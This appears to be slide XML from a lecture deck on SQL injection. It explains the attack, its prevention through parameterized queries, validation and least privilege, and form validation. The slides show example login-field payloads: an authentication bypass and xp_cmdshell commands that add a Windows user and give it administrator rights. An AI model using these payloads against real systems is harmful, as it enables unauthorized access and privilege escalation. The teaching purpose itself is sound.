              <a:t>Text in orange is the hacker input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>black text is your application code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Login:			       Password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Dynamically Build SQL String performing authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and password= ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” + password + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Hacker logs in as:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ or ‘’ = ‘’; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ or ‘’ = ‘’; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> and password=‘’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589828" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1041E87-6ED7-F7B4-BFDC-43D44B557B62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2868336" y="3142216"/>
            <a:ext cx="22860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829" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1947DDAB-45F2-3D41-84EF-96D0B0B4F4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6919773" y="3142216"/>
            <a:ext cx="2362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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8A0E6C-19FF-3F50-A48F-39DF21666479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>More Dangerous SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691203" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE362261-FF34-AAE3-2284-097E33BFABB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Hacker creates a Windows Account: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’; exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'net users username password /add';--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and password= ’’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>And then adds himself as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>adminstrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'; exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Administrators username /add';--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and password= ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>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7AA8718D-6AF8-4170-511A-B3A6F9BD59CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Preventing SQL injection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591875" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9CFE227-F0B7-53D3-41BD-476B95E77578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use Prepared Statements (aka Parameterized Queries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>“select * from accounts where id = “ + id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>vs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>“select * from accounts where id =?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Validate input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Strong typing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>If the id parameter is a number, try parsing it into an integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Business logic validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>If you are expecting a telephone number, test it with a Regular Expressions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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B8568A-D28A-409D-FA7D-3D794E95932B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Preventing SQL injection - Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754691" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F9A813-F5EF-35F7-7F53-65E1AF850EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use the principle of least privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>If the query is reading the database, do not run the query as a user with update permissions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>dbo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, drop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Quiz: Is running a Web Application as the Database System Admin “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>” account a good practice?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>ESCAPE questionable characters (ticks, --, semi-colon, brackets, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="24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9675A2A0-55CD-0AD0-11DA-D242BF9A2390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Injection Impacts </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>More Than SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592899" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043B6E52-AAAC-FD14-8CB2-5A22D2838BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>“Injection Flaw” is a blanket term</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>SQL Injection is most prevalent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Other forms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>XPath Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>LDAP (Lightweight Directory Access Protocol) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>DOM (Document Object Model) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>JSON (Javascript Object Notation) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Log Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>On and on and 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39CACAE8-D532-4FB7-8DF0-DC3C789AB932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Form validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911363" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEB184B9-FCE2-8AD3-A612-49B9388E0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: Examining form parameters to make sure they are acceptable before/as they are submitted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>nonempty, alphabetical, numeric, length, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: HTML/JS checks values before request is sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>server-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: JSP/Ruby/PHP/etc. checks values received.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Some validation is performed by restricting the user's choices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>input text boxes with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>key event listeners that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>erase certain key presses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
